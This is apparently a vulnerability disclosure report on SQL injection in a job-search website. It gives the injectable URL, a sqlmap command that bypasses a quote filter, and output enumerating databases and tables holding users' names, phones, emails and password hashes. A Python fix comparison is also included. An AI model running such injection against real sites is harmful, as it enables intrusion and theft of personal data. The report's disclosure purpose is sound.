2015-10-01: Details reported to the vendor, awaiting vendor handling
2015-10-10: Vendor confirmed; details disclosed to the vendor only
2015-10-20: Details disclosed to core white hats and relevant domain experts
2015-10-30: Details disclosed to regular white hats
2015-11-09: Details disclosed to intern white hats
2015-11-24: Details disclosed to the public
I tested this site before: the job search was injectable, and even after it was fixed, raising the level still got injection. There were submissions every day, but half a year has passed and that one has been fixed, so I kept capturing traffic and found another injection.
Capturing traffic gave the following injection point:
http://**.**.**.**/shixibao/cp.php?ac=zhiwei_new&op=get_2&ignore=1&id=1
The id parameter is injectable. Testing with
http://**.**.**.**/shixibao/cp.php?ac=zhiwei_new&op=get_2&ignore=1&id=1'
returns an error result:
MySQL Error
Message: MySQL Query Error
SQL: select * from shixibao_uchome.mm_postclass_detail WHERE parent_id =1斜杠'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '斜杠'' at line 1
Errno.: 1064
Click here to seek help.
As the error shows, ' is filtered into "斜杠'" (斜杠 being the Chinese word for "slash"), but the filtering is not strict and the quote still breaks the statement, so injection is still possible; after raising sqlmap's level, the filter can be bypassed completely and the injection carried out.
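The filter behaviour visible in the error above, reproduced as an added illustration (this is not code from the report or from the affected site, which runs PHP/MySQL; Python with an in-memory SQLite table is used so it runs offline, and the sample rows and the `name` column are constructed). It shows that rewriting a quote into text that still contains the quote leaves the concatenated statement unparseable, and that the same handler written with a type check plus parameter binding accepts the valid id and rejects the malformed one without any character filtering at all:

```python
import sqlite3

# Sample table, constructed for this illustration (not the site's real schema).
SAMPLE_ROWS = [(1, 1, "class-a"), (2, 1, "class-b"), (3, 2, "class-c")]


def make_db() -> sqlite3.Connection:
    """Build an in-memory table shaped like the one named in the report's error."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE mm_postclass_detail (id INTEGER, parent_id INTEGER, name TEXT)"
    )
    conn.executemany("INSERT INTO mm_postclass_detail VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def weak_filter(value: str) -> str:
    """Reproduce the filter behaviour visible in the report: a single quote is
    rewritten to the text 斜杠 followed by the original quote, so the quote
    itself survives and the statement still breaks."""
    return value.replace("'", "斜杠'")


def query_unsafe(conn: sqlite3.Connection, parent_id: str):
    """Original pattern: filter, then concatenate the value into the SQL text.
    Returns the rows, or an error string when the statement fails to parse
    (the same failure class as the MySQL Errno 1064 shown in the report)."""
    sql = (
        "SELECT id, name FROM mm_postclass_detail WHERE parent_id = "
        + weak_filter(parent_id)
    )
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        return f"syntax error: {exc}"


def query_safe(conn: sqlite3.Connection, parent_id: str):
    """Hardened pattern: the id is numeric, so enforce that type, then bind it
    as a parameter. The driver never treats the value as SQL text, so no
    character-level filtering is needed. Non-numeric input is rejected."""
    try:
        pid = int(parent_id)
    except ValueError:
        return []
    return conn.execute(
        "SELECT id, name FROM mm_postclass_detail WHERE parent_id = ?", (pid,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'"):
        print(f"input {value!r}: unsafe -> {query_unsafe(db, value)}")
        print(f"input {value!r}: safe   -> {query_safe(db, value)}")
```

The point of the comparison is that the weak filter only changes the shape of the failure, not whether attacker-controlled text reaches the SQL parser; the parameterized handler keeps the value out of the parser entirely, so there is nothing for a higher sqlmap level to bypass.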
Test result without --level 5
Test result with --level 5
sqlmap.py -u "http://**.**.**.**/shixibao/cp.php?ac=zhiwei_new&op=get_2&ignore=1&id=1" --threads 10 --dbms "MySQL" -p id --level 5 --current-db --current-user --is-dba --hostname
sqlmap builds the injection payloads for the parameter and tests it:
[16:29:08] [INFO] testing MySQL
[16:29:08] [INFO] confirming MySQL
[16:29:08] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.5.11, Apache 2.4.9
back-end DBMS: MySQL >= 5.0.0
[16:29:08] [INFO] fetching current user
current user: 'admin@%'
[16:29:08] [INFO] fetching current database
current database: 'shixibao_uchome'
[16:29:08] [INFO] fetching server hostname
hostname: 'WIN-9VCJIM9JGJ2'
[16:29:08] [INFO] testing if current user is DBA
[16:29:08] [INFO] fetching current user
current user is DBA: True

[16:23:38] [INFO] testing MySQL
[16:23:38] [INFO] confirming MySQL
[16:23:38] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.5.11, Apache 2.4.9
back-end DBMS: MySQL >= 5.0.0
[16:23:38] [INFO] fetching database users
database management system users [8]:
[*] ''@'localhost'
[*] 'admin'@'%'
[*] 'admin'@'localhost'
[*] 'cem'@'%'
[*] 'pma'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'::1'
[*] 'root'@'localhost'

available databases [16]:
[*] cdcol
[*] cem_db
[*] game
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] shixibao
[*] shixibao_uc
[*] shixibao_uchome
[*] shixibao_uchome_20140525
[*] test
[*] testmql
[*] ultrax
[*] webauth
[*] zhiweibeifen

Database: shixibao_uchome
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| mm_hgz_user | 419959 |  (users)
| uchome_spaceinfo | 232626 |
| uchome_creditlog | 77958 |
| mm_member_view | 43670 |
| uchome_member | 43670 |  (members)
| uchome_space | 39361 |
| uchome_spacefield | 38057 |
| mm_usereduinfo | 36957 |  (user education info)
| mm_userresumeinfo | 36957 |  (user résumé info)
| mm_userbaseinfo | 35948 |
| mm_userinfo | 35948 |  (user info)
| mm_zhiweiapply_view | 34043 |
| mm_zhiweiinfo | 34043 |
| mm_zhiweiapply_view_1 | 33827 |
| mm_zhiwei_temp | 33302 |
| mm_userinfo_zhiweiinfo_all | 32937 |
| uchome_notification | 22243 |
| uchome_activity_notice | 22100 |
| mm_mailqueue | 21633 |
| mm_youngmembers | 15836 |
| uchome_resume | 13136 |
| mm_userskill_map | 6584 |
| mm_department | 5276 |
| mm_deptinfo | 5240 |
| mm_delivery | 4589 |
| mm_compus_posdeli_view | 4184 |
| mm_useruniversmap | 4157 |
| mm_userunivsmap_view | 4157 |
| mm_personal_zhaopin | 3627 |
| mm_young_tribe | 3222 |
| mm_univs | 3209 |
| mm_user_upload | 2874 |
| jobcollect | 2494 |
| mm_company_interest | 2165 |
| uchome_usertask | 1190 |
| mm_fam_enterprise | 1100 |
| mm_company_visitor | 865 |
| mm_enterprise_zhaopin | 857 |
| uchome_comment | 817 |
| uchome_member_third | 732 |
| mm_post_recommend | 728 |
| mm_zhiwei_questions | 691 |
| mm_home_card | 594 |
| mm_userreg_channel | 559 |
| mm_follow | 510 |
| uchome_stat | 502 |
| mm_zhiwei_send | 428 |
| mm_city | 357 |
| uchome_friend | 350 |
| uchome_coupon | 300 |
| uchome_pic | 296 |
| uchome_visitor | 225 |
| uchome_tagspace | 221 |
| uchome_tagblog | 217 |
| uchome_feed | 203 |
| uchome_tag | 176 |
| mm_employinfo | 174 |
| mm_employinfo_view | 174 |
| mm_score_item | 152 |
| mm_dept_location | 147 |
| uchome_zan | 138 |
| uchome_blogfield | 128 |
| mm_delivercont_view | 123 |
| uchome_blog | 122 |
| uchome_doing | 117 |
| uchome_config | 108 |
| mm_score_stat | 106 |
| mm_lucky_log | 98 |
| mm_score_mark | 97 |
| mm_delivery_attach | 94 |
| uchome_album | 92 |
| mm_taskuser_map | 89 |
| mm_score_marker | 81 |
| mm_themes | 71 |
| mm_score_task | 68 |
| uchome_post | 66 |
| mm_usercode_map | 52 |
| uchome_creditrule | 47 |
| uchome_thread | 44 |
| mm_zhiwei_replayments | 43 |
| mm_grades_user | 42 |
| mm_postclass_detail | 38 |
| mm_provinces | 34 |
| mm_score_template | 34 |
| mm_interview_notice | 26 |
| mm_video_course | 25 |
| uchome_magic | 25 |
| mm_young_report | 24 |
| uchome_magicstore | 24 |
| mm_score_eachsum | 22 |
| mm_replayments | 21 |
| mm_young_report_map | 21 |
| mm_younger_gd_temp | 20 |
| mm_taskcompany_map | 18 |
| mm_attach_files | 15 |
| mm_lucky_wall | 15 |
| uchome_click | 15 |
| mm_subscribe_job | 14 |
| mm_audition_task | 13 |
| mm_questions | 13 |
| uchome_profield | 13 |
| mm_postclass | 12 |
| mm_questions_view | 12 |
| mm_replayments_view | 12 |
| mm_dynamic | 11 |
| uchome_event | 11 |
| uchome_eventfield | 11 |
| uchome_userevent | 11 |
| mm_audition_user | 10 |
| mm_mail_template | 10 |
| mm_report | 10 |
| uchome_mtag | 10 |
| mm_talent_pool | 9 |
| uchome_poke | 9 |
| uchome_usergroup | 9 |
| uchome_data | 8 |
| mm_jianzhi_delivery | 7 |
| mm_sys_post | 7 |
| mm_ztask_classify | 7 |
| uchome_cron | 7 |
| uchome_task | 7 |
| uchome_eventclass | 6 |
| uchome_job | 6 |
| uchome_spacelog | 6 |
| mm_post_attachment | 5 |
| mm_sys_picplay | 5 |
| mm_video_wall | 5 |
| uchome_class | 5 |
| uchome_polloption | 5 |
| mm_like | 4 |
| mm_video_score | 4 |
| uchome_magicinlog | 4 |
| mm_grades_enter | 3 |
| uchome_picfield | 3 |
| uchome_statuser | 3 |
| uchome_usermagic | 3 |
| mm_grade_template | 2 |
| mm_task | 2 |
| uchome_eventpic | 2 |
| uchome_mailqueue | 2 |
| uchome_report | 2 |
| mm_compus_news | 1 |
| mm_score | 1 |
| mm_strategies | 1 |
| mm_students_star | 1 |
| mm_whos_online | 1 |
| uchome_block | 1 |
| uchome_home_card | 1 |
| uchome_invite | 1 |
| uchome_poll | 1 |
| uchome_pollfield | 1 |
| uchome_session | 1 |
| uchome_show | 1 |
+----------------------------+---------+

Database: shixibao
+-------------------------------------+---------+
| Table | Entries |
+-------------------------------------+---------+
| phome_ecms_zhiwei_crawl_copy | 1382607 |
| phome_ecms_jianzhi_crawl | 376758 |
| phome_ecms_zhiwei_crawl_copy_cl | 114558 |
| phome_ecms_zhiwei_crawl | 56813 |
| phome_ecms_zhiwei_crawl_sxs_copy | 51662 |
| phome_ecms_zhiwei | 50579 |
| ecms_post_mapping | 34324 |
| mm_zhiweiapply_view | 34043 |
| phome_ecms_zhiwei_crawl_copy_backup | 19955 |
| phome_ecms_zhiwei_data_1 | 13547 |
| phome_ecms_zhiwei_index | 13498 |
| phome_enewsdolog | 2519 |
| ecms_post_mapping_history | 1907 |
| phome_ecms_zhiwei_crawl_test | 1669 |
| phome_ecms_zhiwei_crawl_1 | 1245 |
| phome_ecms_zhiwei_crawl_sxs | 1024 |
| phome_enewsdownerror | 1008 |
| phome_enewssearch | 942 |
| phome_ecms_jianzhi_crawl_test | 729 |
| phome_enewslog | 456 |
| yjsqzw | 385 |
| phome_enewsf | 199 |
| phome_enewsmemberadd | 75 |
| phome_enewsmember | 73 |
| phome_enewstempbak | 61 |
| phome_enewsclass | 56 |
| phome_enewsclass_stats | 56 |
| phome_enewsclassadd | 56 |
| phome_enewstempdt | 56 |
| phome_enewsdiggips | 52 |
| phome_ecms_info | 41 |
| phome_ecms_info_data_1 | 41 |
| phome_ecms_info_index | 41 |
| phome_ecms_locationorder | 34 |
| phome_ecms_news | 34 |
| phome_ecms_news_data_1 | 34 |
| phome_ecms_news_index | 34 |
| phome_ecms_zhiwei_history | 32 |
| phome_ecms_download | 24 |
| phome_ecms_download_data_1 | 24 |
| phome_ecms_download_index | 24 |
| phome_ecms_movie | 24 |
| phome_ecms_movie_data_1 | 24 |
| phome_ecms_movie_index | 24 |
| phome_ecms_shop | 24 |
| phome_ecms_shop_data_1 | 24 |
| phome_ecms_shop_index | 24 |
| phome_enewsbq | 23 |
| phome_ecms_article | 18 |
| phome_ecms_article_data_1 | 18 |
| phome_ecms_article_index | 18 |
| phome_enewsbqtemp | 17 |
| phome_enewslink | 14 |
| phome_enewslisttemp | 13 |
| phome_enewstable | 13 |
| phome_ecms_flash | 12 |
| phome_ecms_flash_data_1 | 12 |
| phome_ecms_flash_index | 12 |
| phome_enewsmemberf | 12 |
| phome_enewsmod | 12 |
| phome_enewstempvar | 12 |
| phome_enewsnewstemp | 11 |
| phome_enewsfeedbackf | 9 |
| phome_ecms_photo | 7 |
| phome_ecms_photo_data_1 | 7 |
| phome_ecms_photo_index | 7 |
| phome_enewsshoppayfs | 6 |
| phome_ecms_tongzhi | 5 |
| phome_ecms_tongzhi_data_1 | 5 |
| phome_ecms_tongzhi_index | 5 |
| phome_enewsfile_1 | 5 |
| phome_enewsnotcj | 5 |
| phome_enewsbqclass | 4 |
| phome_enewsfile_other | 4 |
| phome_enewsmembergroup | 4 |
| phome_enewsplayer | 4 |
| phome_enewsshopps | 4 |
| phome_enewsuser | 4 |
| phome_enewsuseradd | 4 |
| phome_enewsuserloginck | 4 |
| phome_enewszt | 4 |
| phome_enewsztadd | 4 |
| phome_enewsclassnavcache | 3 |
| phome_enewspage | 3 |
| phome_enewspayapi | 3 |
| phome_enewsadminstyle | 2 |
| phome_enewsclasstemp | 2 |
| phome_enewsgbook | 2 |
| phome_enewsmemberform | 2 |
| phome_enewssearchtemp | 2 |
| phome_enewsspacestyle | 2 |
| phome_enewsvotetemp | 2 |
| phome_enewswapstyle | 2 |
| phome_ecms_infoclass_news | 1 |
| phome_enewsadclass | 1 |
| phome_enewsclass_stats_set | 1 |
| phome_enewsdo | 1 |
| phome_enewsfeedbackclass | 1 |
| phome_enewsfile_member | 1 |
| phome_enewsgbookclass | 1 |
| phome_enewsgroup | 1 |
| phome_enewsindexpage | 1 |
| phome_enewsinfoclass | 1 |
| phome_enewsjstemp | 1 |
| phome_enewsloginfail | 1 |
| phome_enewspageclass | 1 |
| phome_enewspicclass | 1 |
| phome_enewspl_set | 1 |
| phome_enewspltemp | 1 |
| phome_enewspostserver | 1 |
| phome_enewsprinttemp | 1 |
| phome_enewspublic | 1 |
| phome_enewspublic_update | 1 |
| phome_enewspubtemp | 1 |
| phome_enewsshop_set | 1 |
| phome_enewstempgroup | 1 |
| phome_enewsuserlist | 1 |
| phome_enewsuserlistclass | 1 |
| phome_enewsztclass | 1 |
+-------------------------------------+---------+

Database: shixibao_uc
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| uc_members | 52392 |
| uc_memberfields | 24057 |
| uc_comments | 739 |
| uc_notelist | 573 |
| uc_friends | 144 |
| uc_pms | 74 |
| uc_settings | 27 |
| uc_newpm | 14 |
| uc_applications | 4 |
| uc_failedlogins | 2 |
| uc_protectedmembers | 2 |
+---------------------+---------+

Database: shixibao_uchome_20140525
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| uchome_spaceinfo | 9899 |
| uchome_feed | 3915 |
| uchome_creditlog | 2886 |
| uchome_space | 1364 |
| uchome_spacefield | 1343 |
| mm_member_view | 1335 |
| uchome_member | 1335 |
| uchome_resume | 1057 |
| uchome_statuser | 511 |
| uchome_visitor | 119 |
| uchome_config | 108 |
| uchome_usertask | 77 |
| mm_department | 75 |
| uchome_creditrule | 47 |
| uchome_magic | 25 |
| uchome_magicstore | 24 |
| uchome_friend | 16 |
| uchome_click | 15 |
| uchome_stat | 12 |
| uchome_usergroup | 9 |
| mm_postclass | 7 |
| uchome_data | 7 |
| uchome_task | 7 |
| uchome_eventclass | 6 |
| uchome_job | 6 |
| uchome_cron | 5 |
| uchome_polloption | 5 |
| uchome_notification | 4 |
| uchome_event | 3 |
| uchome_eventfield | 3 |
| uchome_profield | 3 |
| uchome_userevent | 3 |
| uchome_magicinlog | 2 |
| uchome_usermagic | 2 |
| mm_deptinfo | 1 |
| uchome_mailcron | 1 |
| uchome_mailqueue | 1 |
| uchome_poll | 1 |
| uchome_pollfield | 1 |
+---------------------+---------+

Database: ultrax
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| pre_common_district | 45051 |
| pre_common_setting | 406 |
| pre_common_member | 138 |
| pre_common_member_count | 125 |
| pre_common_member_field_forum | 125 |
| pre_common_member_field_home | 125 |
| pre_common_member_profile | 125 |
| pre_common_member_status | 125 |
| pre_common_block_style | 103 |
| pre_common_syscache | 103 |
| pre_common_smiley | 85 |
| pre_forum_statlog | 82 |
| pre_common_admincp_perm | 67 |
| pre_common_member_profile_setting | 51 |
| pre_common_nav | 48 |
| pre_common_stylevar | 45 |
| pre_forum_forumfield | 37 |
| pre_forum_forum | 36 |
| pre_common_credit_rule | 31 |
| pre_common_stat | 28 |
| pre_common_credit_rule_log | 26 |
| pre_common_cron | 20 |
| pre_common_onlinetime | 20 |
| pre_common_usergroup | 20 |
| pre_common_usergroup_field | 20 |
| pre_home_click | 15 |
| pre_common_plugin | 12 |
| pre_forum_medal | 10 |
| pre_common_admingroup | 7 |
| pre_forum_typeoption | 6 |
| pre_common_admincp_group | 5 |
| pre_common_friendlink | 5 |
| pre_forum_post | 5 |
| pre_forum_post_tableid | 5 |
| pre_forum_bbcode | 4 |
| pre_forum_onlinelist | 4 |
| pre_forum_thread | 4 |
| pre_forum_grouplevel | 3 |
| pre_forum_imagetype | 3 |
| pre_forum_sofa | 3 |
| pre_common_admincp_session | 2 |
| pre_common_block | 2 |
| pre_common_failedlogin | 2 |
| pre_common_statuser | 2 |
| pre_common_template_block | 2 |
| pre_common_word_type | 2 |
| pre_forum_threadcalendar | 2 |
| pre_forum_threadhot | 2 |
| pre_mobile_setting | 2 |
| pre_mobile_wsq_threadlist | 2 |
| pre_common_diy_data | 1 |
| pre_common_style | 1 |
| pre_common_template | 1 |
| pre_forum_filter_post | 1 |
| pre_forum_threadpartake | 1 |
| pre_forum_threadprofile | 1 |
| pre_home_favorite | 1 |
+-----------------------------------+---------+

Database: cem_db
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| cem_circuit_province_calc | 1762584 |
| cem_circuit_province_quarter_calc | 587528 |
| cem_kmeans_customer_calc | 439524 |
| cem_sfactor_pro_customer_calc | 424572 |
| cem_circuit_qoe | 266167 |
| cem_sfactor_all_customer_calc | 188592 |
| data_original_maintain | 161114 |
| cem_circuit_province_year_calc | 146882 |
| cem_kmeans_customer_quarter_calc | 146508 |
| cem_sfactor_pro_customer_quarter_calc | 141524 |
| cem_circuit_qoe_quarter | 89263 |
| cem_circuit_calc | 88452 |
| cem_sfactor_all_customer_quarter_calc | 62864 |
| cem_maintain | 57285 |
| cem_kmeans_customer_year_calc | 36627 |
| cem_sfactor_pro_customer_year_calc | 35381 |
| cem_circuit_quarter_calc | 29484 |
| data_original_trouble | 23296 |
| cem_circuit_qoe_year | 22924 |
| cem_sfactor_all_customer_year_calc | 15716 |
| cem_customer_rate | 15305 |
| data_original_circuit | 12712 |
| cem_trouble | 12589 |
| numbers | 10000 |
| cem_circuit_info | 7371 |
| cem_circuit_year_calc | 7371 |
| cem_d_time | 4018 |
| data_original_kaitong | 909 |
| cem_kaitong | 830 |
| buffer_industry_rate | 645 |
| cem_busi_prefect_rate | 372 |
| cem_kmeans_province_calc | 372 |
| cem_sfactor_province_calc | 372 |
| cem_busi_prefect_rate_quarter | 124 |
| cem_kmeans_province_quarter_calc | 124 |
| cem_sfactor_province_quarter_calc | 124 |
| buffer_customer_circuit | 72 |
| cem_province | 38 |
| cem_busi_prefect_rate_year | 31 |
| cem_kmeans_province_year_calc | 31 |
| cem_sfactor_province_year_calc | 31 |
| cem_user_customer_relation | 23 |
| cem_customer | 22 |
| cem_customer_selected | 22 |
| cem_indicator | 16 |
| cem_industry | 10 |
| numbers_small | 10 |
| cem_indicator_expect | 8 |
| cem_indicator_threshold | 8 |
| sys_user | 5 |
| sys_user_role | 5 |
| sys_role | 4 |
| cem_business | 3 |
| cem_data_file | 2 |
+---------------------------------------+---------+

Database: game
+---------------+---------+
| Table | Entries |
+---------------+---------+
| game_outwatch | 16 |
| game_admin | 4 |
| game_node | 4 |
| game_path_map | 3 |
| game_mobile | 2 |
| game_path | 2 |
+---------------+---------+

Database: shixibao_uchome
Table: mm_userinfo
[18 columns]
+------------+-----------------------+
| Column | Type |
+------------+-----------------------+
| birthcity | varchar(20) |
| birthyear | smallint(6) unsigned |
| edu_degree | smallint(6) |
| email | varchar(100) |
| endyear | smallint(6) unsigned |
| major | varchar(255) |
| mobile | varchar(40) |
| msn | varchar(80) |
| name | char(20) |
| qq | varchar(20) |
| residecity | varchar(20) |
| resumename | varchar(100) |
| resumeurl | varchar(100) |
| school | text |
| sex | tinyint(1) |
| startyear | smallint(6) unsigned |
| uid | mediumint(8) unsigned |
| username | char(15) |
+------------+-----------------------+

Database: shixibao_uchome
Table: uchome_member
[9 columns]
+-----------+-----------------------+
| Column | Type |
+-----------+-----------------------+
| companyid | int(50) |
| deptid | int(20) |
| hasresume | varchar(255) |
| isactive | tinyint(4) |
| mail | varchar(100) |
| password | char(32) |
| type | int(5) |
| uid | mediumint(8) unsigned |
| username | char(200) |
+-----------+-----------------------+

Database: shixibao_uchome
Table: mm_hgz_user
[18 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| address | varchar(200) |
| birth | varchar(200) |
| degree | varchar(200) |
| education | text |
| email | varchar(200) |
| evaluation | text |
| height | varchar(200) |
| hometown | varchar(200) |
| id | int(10) |
| intend | text |
| mobile | varchar(200) |
| name | varchar(200) |
| nation | varchar(200) |
| qq | varchar(200) |
| sex | varchar(200) |
| title | varchar(200) |
| weight | varchar(200) |
| zzmm | varchar(200) |
+------------+--------------+

Database: shixibao_uchome
Table: mm_youngmembers
[16 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| age | int(5) |
| city | varchar(100) |
| gender | int(1) |
| iskeyperson | int(1) |
| mail | varchar(200) |
| major | varchar(64) |
| name | varchar(200) |
| phone | varchar(50) |
| school | varchar(200) |
| schoolid | int(11) |
| status | int(10) |
| tribeid | int(200) |
| uid | int(10) |
| updatetime | int(10) |
| wechatId | varchar(200) |
| yixinId | varchar(200) |
+-------------+--------------+
Only part of it is listed; I won't go on with the remaining several hundred thousand users, and I won't analyze the tens of millions of records either! ~~~
Keep on filtering! ~~~
Severity: High
Vulnerability Rank: 11
Confirmation time: 2015-10-10 17:05
CNVD confirmed the situation described and has forwarded it via CNCERT to China Telecom Group Corporation, which will coordinate handling with the website's operating unit.
None yet